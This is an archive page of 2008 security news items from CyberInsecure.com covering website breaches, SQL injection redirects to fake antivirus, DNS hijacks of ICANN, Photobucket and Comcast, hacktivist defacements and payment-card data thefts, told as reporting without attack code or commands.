CyberInsecure.com

Archive for the ‘Hacked’ Category

Sony’s USA PlayStation website, a website with a very large number of daily visitors according to Alexa, had been the victim of an SQL injection attack. Sony PlayStation’s site is another high trafficked web site that fall victim into the continuing waves of massive botnets (ASProx botnet for example) SQL injections.

The purpose of this wave of attacks seems to be to dupe users into installing the same fake anti-virus software SophosLabs discovered on .MOBI websites earlier this week. Numerous malicious websites making use of the unusual .MOBI top level domain attempted to load a script ‘AD.JS’ located in root of each site. This in turn attempted to load another website - a fake anti-virus install site. The site pretends to do an online virus scan:

A bogus warning message then displayed, saying that one or more of the following have been detected:

Trojan.Bakloma.A
Win32.Gattman.A
Trojan.Zapchas.F
JS.Blackworm.A
Trojan.Tibs.E
Win32.Netsky.P@mm
Trojan.Winsys
Trackware.Adctech2006
Downloader.TrafficSector
Adware.Roings

If you have seen/installed this software on your PC, consider running a trusted anti-virus as soon as possible, since your machine is infected.

After this, the user is encouraged to download and run an executable (installer.exe). This malware is detected as Mal/Packer by Sophos. If the installer was run, it installs more malicious files (Troj/FakeAV-AA) on the victim machine.

Visiting the affected PlayStation site runs a script that pretends to perform the same online security scan of your computer, and presents a bogus warning message you can see on the image above. Users frightened by the fake ‘warnings’ might rush to spend money on useless software.

The fact that the Sony PlayStation site has been attacked in this way suggests that someone with malicious intent could place other harmful malware there and infect a very high number of Sony PlayStation website visitors.

Sony PlayStation’s site hasnt been targeted by hackers, it’s been targeted automatically in between the rest of thousands of other pages that were SQL injected with a malicious coldwop.com domain (yet another SQL injection attack by Chinese hackers). There are no reports of hacked Sony PlayStation’s database or customers private details, the flaw in Sony’s website only allowed injection of redirection code that loads a script from malicious site.

At least 51,000 records were exposed in the breach at the parent company of Montgomery Ward. The venerable Wards chain that began in 1872 went out of business in 2001, but in 2004 a catalog company, Direct Marketing Services Inc., bought the brand name out of bankruptcy. It now runs a Wards.com Web site along with six other sites, including three with Sears brands it has acquired: SearsHomeCenter.com, SearsShowplace.com and SearsRoomforKids.com.

The financial company Citigroup detected the computer invasion in December. By going through HomeVisions.com, another Direct Marketing Services site, hackers had plundered the database that holds account information for all the company’s retail properties.

An online chatter was detected in June by Affinion Group Inc.’s CardCops, a group of investigators who track payment-card theft for financial institutions. In Internet chat rooms frequented by card thieves, CardCops spotted hackers touting the sale of 200,000 payment cards belonging to one merchant. CardCops then intercepted several hundred of the records, along with the online handles belonging to hackers whose real names remain unknown.

Along with the card numbers, their three-digit “security codes” and expiration dates, the thieves had the cardholders’ names, addresses and phone numbers. The data had been organized in the same way, indicating the numbers likely came from the same database. The vast majority of the cardholders were women, a clue that the records came from a merchant catering to a certain demographic.

When cardholders were contacted, the first eight said they had bought things online or through mail order from Montgomery Ward. Further investigation showed that there is a high probability that the entire database of Montgomery Ward was breached.

Direct Marketing Services immediately informed its payment processor and Visa and MasterCard and closely followed a set of guidelines, issued by Visa, on how to respond to a security breach, including a report to the U.S. Secret Service. Those guidelines from Visa are largely technical, and do not require the organizations that have been hacked to come clean to the affected consumers, not just to the financial industry. Companies that fail to comply can be hit with fines or be sued by affected customers, depending on the state.

As a result, scores of breaches covering hundreds of millions of consumer accounts have been disclosed by banks, universities, corporations and retailers in recent years. Direct Marketing Services now plans to contact consumers.

It is not clear whether the hackers were inflating their claim when they offered 200,000 records or whether the official number of 51,000 is accurate.

The official domains of ICANN, the Internet Corporation for Assigned Names and Numbers, and IANA, the Internet Assigned Numbers Authority were hijacked earlier today, by the NetDevilz Turkish hacking group which also hijacked Photobucket domain on the 18th of June.

The domains that were hijacked are icann.net, icann.com, iana-servers.com, internetassignednumbersauthority.com, iana.com.
ICANN is responsible for the global coordination of the Internet’s system of unique identifiers. These include domain names, as well as the addresses used in a variety of Internet protocols. The Internet Assigned Numbers Authority (IANA) is responsible for the global coordination of the DNS Root, IP addressing, and other Internet protocol resources.

NetDevilz left the following message on all of the domains :

You think that you control the domains but you don’t! Everybody knows wrong. We control the domains including ICANN! Don’t you believe us? haha :) (Lovable Turkish hackers group)

The hackers redirected visitors to Atspace.com (82.197.131.106) free hosting again. Atspace was used when during the Photobucket DNS hijacking. Since the NetDevilz hacking group declined to reveal how they did it, many consider cross-site scripting or cross-site request forgery vulnerability as the methods used to hijack domains.

Israeli hacking group broke into sites of Izz al-Din al-Qassam, the terrorists military wing, and some leftist movements. Hacked websites were defaced and previous information replaced with words of Israeli national anthem. Currently the website of Izz al-Din al-Qassam displays a white screen and words in Arabic announcing technical difficulties.

The hacker group, which calls itself Fanat al-Radical (the fanatical radicals), also said that it broke into additional terror organizations’ sites and those of various leftist movements. According to this group unnamed representative, they searched for relevant sites, whether leftist or anti-Zionist, and looked for loopholes. The group consists of young adults from 16 to 18 years of age.

In addition to the Hamas military wing’s site, they also broke into the Balad political party site (http://arabs48.com/balad), that of the Hagada Hasmalit (the left bank, http://www.hagada.org.il), the Kibush (occupation, kibush.co.il) site and more. The Left Bank site, considered by the group as another site identifying with the left, was defaced “due to its blatant anti-Zionist contents”. The hacked sites are now equipped with an Israeli flag, the words of the Israeli national anthem “Hatikva” with vowels and pictures of Palestinian babies and children dressed as suicide bombers. A short explanation of why this specific site was broken into to begin with is also included.

Fanat al-Radical is a new group of hackers whose members were members of another group called Kamikaz Team. According to them, since they didn’t want to include politics in Kamikaz, a parallel group that supports the destruction of Arab sites was created. The group feels that its first hacking campaign was successful, but they do not intend on stopping here. They said that they plan an additional attack in the future.

Photobucket, a very popular photo sharing site, had its DNS records hacked yesterday by a Turkish hacking group known for its defacement of the adult video site Redtube earlier this year.

Photobucket users across the world repored outages of the service and problems when trying to login to their accounts. A very similar incident happened to DNS records of Comcast.net, which redirected users to a third-party domain a few weeks ago.

The hacking group left a message that appears to have been loading from a third-party free hosting domain atspace.com. This web hosting service belongs to Zetta hosting solutions, and users of Photobucket attempting to access the site with the old DNS entries are still being redirected to a default hosting ad page within atspace.com. There are no reports of malware infections or stolen accounts as a result of this incident.

It seems Photobucket did not acknowledge the service suffered from hijacked DNS. Instead, Photobucket said nothing on their blog and website, and when the users started discussing this on Photobucket’s own support forums, according to a comment left by a Photobucket Forum Support representative, there was just a downtime of about one hour due to changed DNS entries:

On Tuesday afternoon, some users that typed in the Photobucket.com URL were temporarily redirected to an incorrect page due to an error in our DNS hosting services. The error was fixed within an hour of its discovery, but due to the nature of the problem, some users will not have access to Photobucket for a few hours as the fix rolls out. It is important to note that only a portion of Photobucket users encountered the problem and that no Photobucket content, password information or other personal information was affected by the redirect.

DivShare, an online service for storing and sharing video, photos, music and documents, has had a security breach. The company announced on its blog tonight that a malicious user had accessed its database, which included user e-mail addresses and other basic profile information.

DivShare is an online file-sharing service with more than half a million members. It is free to sign up for, gives members 5GB of storage and it is possible to download 50GB of data from the service per month.

DivShare members have been warned regarding this security breach by an email from the service. DivShare temporarily took all members’ files offline and implemented a new security system, though full access to the files has now been restored, the company said.

“No financial information has been accessed by any unauthorized parties. We have taken extreme measures to secure the site in the last 12 hours and are currently in the process of rolling out new security precautions,” the statement said. It also says that the company apologizes for allowing this breach to take place and takes every precaution available to ensure that this doesn’t happen again.

While it’s good that DivShare provides information about their security breach, it might be hard to trust again a company that allowed personal information to be accessed by hackers. Although they quickly resolved the issue, the database remains compromised, and this is probably why DivShare recommends all users to change account password and the passwords on any private folders as a security precaution.

According to DivShare website update from 8:30 PM ET, all files are now back online after outages caused by security upgrades. Concerned members of DivShare service can contact support in case of any questions.

Altman Weil online store was compromised by a virus that may have exposed the credit card information of certain store customers. It has been discovered on May 16, 2008 by the company that hosts the online store website. The hosting company remains unnamed in the official Maryland State Attorney General breach notification, but the current hoster of Altman Weil online store seems to be mindSHIFT.

Upon learning of this unauthorized breach and attack, on that same day, Altman Weil immediately authorized the hosting company to shut the site down so that access was no longer possible. Altman Weil assured that the hosting company has preserved logs and electronic evidence, has logged all actions taken, and has not altered or compromised the systems.

According to the hosting company, the server on which the online store located was password protected and had current firewalls and security protection, but it seems like, what company calls “SQL virus”, may nonetheless have accessed credit card information.

This attack is currently under investigation in order to fully determine the extent to which credit card information of customers may have been accessed.

Altman Weil notified all card holders by letter of the situation and the possible risk. They notified police department located in Newton Square, Pennsylvania, where Altman Weil is located on May 23, 2008. Also contacted: Secret Service’s ECTF and Electronic Crimes Working Group, every state Attorney General in the states where potentially affected cardholders reside, Federal Trade Commission, Office of Thrift Supervision, Office of the Comptroller of the Currency, Federal Deposit Insurance Corporation, Board of Governors of the Federal Reserve System.

For more information, Joann Miller at Altman Weil, Inc. can be contacted at 610-886-2006, or via email at: jamiller<at>altmanweil.com.

Cotton Traders clothing firm website was hacked earlier this year and credit card details of up to 38,000 customers were stolen by unidentified attackers. Customer addresses were also stolen in this incident. The firm has not yet released the full details of the breach.

In a statement to BBC News, Cotton Traders said all of its customers’ credit card data was encrypted on the website. The firm brought in industry security experts to resolve the problem and have recently upgraded all security on their website which has been validated by leading industry experts. It added: “We would like to reassure all our customers that their data is secure and that the Cotton Traders website meets all leading Industry security standards.”

The exact method used to hack the Cotton Traders website is unknown. The firm has said customers worried about their cards should contact their card provider.

Hackers broke into South Bend, Ind.-based 1st Source Bank system from the outside and compromised a server containing debit card data. The bank is currently reissuing its entire portfolio of debit cards, probably tens of thousands of them.

The $4.5-billion-asset bank with 79 branches in northern Indiana and southern Michigan began alerting customers last month after an outside monitoring service it uses noticed on May 12 an unusual flow of data from a bank server containing debit card data. The server was immediately shut down. The bank notified law-enforcement authorities and hired outside forensic firms to analyze the breach.

The server that holds debit card information transferred information out. It is unclear what percent of card holders is affected. The hackers got Track 2 data contained on magnetic stripes, including account numbers and PINs in at least some cases. The information how the hackers tapped the server was not released to public.

1st Source Bank is sending out letters reminding their customers to check their recent bank account activity. Out of an overabundance of care, the bank is reissuing new MasterCard-branded debit cards to all customers. 1st Source also is offering customers free credit-report monitoring for a year and called in a forensic computer specialist team from the Washington, D.C., area to shut down the breach immediately and to help determine who was behind it.

Bank officials have yet to tally the cost of mailings to customers, creating new debit cards, consultants’ fees, paying for identity theft protection and employee overtime related to the security breach.

So far no fraud has been discovered as a result of the intrusion.

UK Home Office crime reduction website (crimereduction.homeoffice.gov.uk) was hacked on Monday. The attackers used the hacked website to host an Italian phishing website. Remote file inclusion exploit was used to launch the phished page off the web server hosting Crime Reduction website on homeoffice.gov.uk. As a result of the SQL Injection attack a page resembling the www.poste.it site was served up so that it appeared to come from the homeoffice.gov domain. Poste.it is a website of an Italian bank and is a frequent target of phishing attacks.

According to net security firm, phishing fraudsters used the POST method so that phished data submitted by victims was sent to them. It is unclear why they picked a government page located in the UK to host a phishing attack. Usually phishers pick or register a domain name for the fake website that looks as much as possible to the original website to confuse the victims.

The Home Office pulled the rogue content from its site early on Monday morning. This attack is another example of cybrecriminals abusing security exploits on trusted websites to serve up fraudulent content such as fake phishing pages or install malware. Home Office crime reduction website joins a long list of other UK government sites and US Department of Homeland Security website that were abused by attackers during last months. The fact this time it is a crime reduction website should be extra-embarrassing for this British government department.

Security pros had to take down the University of Arizona-hosted site after script kiddies replaced the lead blog entry with a message “hacked by VITAL.” The hackers redirected visitors of the Phoenix mission’s official web page and a companion site to a third-party destination. That page gave credit to hackers going by the names BLaSTER and Cr@zy_king.

A spokeswoman for the Phoenix Mars Lander mission says a hacker took over the mission’s public website and changed its lead news story with a hacker’s signature and a link redirecting visitors to an overseas website. The site hosted by the University of Arizona has been taken off line while computer experts work to correct the problem.

Over the past few months, millions of websites, some belonging to the US Department of Homeland Security, the United Nations and the UK Civil Service, have been hit by similar exploits. The attacks aren’t the result of vulnerabilities in the database or web services software provided by Microsoft, Apache and others, but rather in the custom-made web applications.

There are no reports that redirected visitors in this latest episode were exposed to links that attempted to silently install malware on their machines. The Phoenix Mars Lander mission’s security staff have already fixed the defacement.

Comcast.net, the portal of US communications provider Comcast, was hacked on Wednesday night. As a result of the attack Comcast subscribers were unable to access their email or other services through the portal for more than two hours. Comcast is the second biggest ISP in the US and a major provider of cable TV services.

The comcast.net front page was replaced by a greeting from hackers on May 28. The defacement was removed after more than two hours. Users were then confronted by a “page under construction” message before the site was restored in the early hours of Thursday morning. The site remained intermittently unavailable even after this time. The exact mechanism of the attack is still unclear, though an injected iFrame that served up content from sites under the control of hackers is suspected. Some form of DNS redirection attack may also have been involved.

Normally defacement attacks simply involve some text message or an image on a website. However, in the case of the Comcast attack it seems some attempt may have been made to snoop on its users’ login credentials.

There are still a lot of speculations about the details of this and why this happened. The defacement was claimed by 2 hackers who left the following message on a white blank page of Comcast.net: “KRYOGENIKS Defiant and EBK RoXed COMCAST sHouTz To VIRUS Warlock elul21 coll1er seven”.

Update: Not only  the hackers hijacked Comcast’s domain name for three hours overnight, they also sent subscribers who tried to access webmail and other services to a rogue site that bragged of the exploit.

Comcast lost control of the comcast.net address after the attackers changed registration information stored by its domain registrar, Network Solutions. The unauthorized change redirected people attempting to visit the site to a page that read: “KRYOGENIKS Defiant and EBK RoXed COMCAST. sHouTz To VIRUS Warlock elul21 coll1er seven.” The page was displayed after the attackers altered the site’s IP resolution information, replacing Comcast’s IP address with the rogue address 209.62.20.186. In addition to their cryptic defacement, they altered the address for Comcast’s administrative contact to “69 dick tard lane, dildo room.”

Comcast said there was no immediate evidence that the attackers’ page tried to install malware or steal user credentials. But some reports claimed that email clients were redirected to the impostor address, requesting their login name and password.

It’s still unclear how the attackers accessed the registration settings on store with Network Solutions. A Network Solutions spokeswoman said the company is working with Comcast to figure out how the hackers obtained the login credentials to the account. Comcast is also working with unnamed law enforcement agencies to track down the attackers.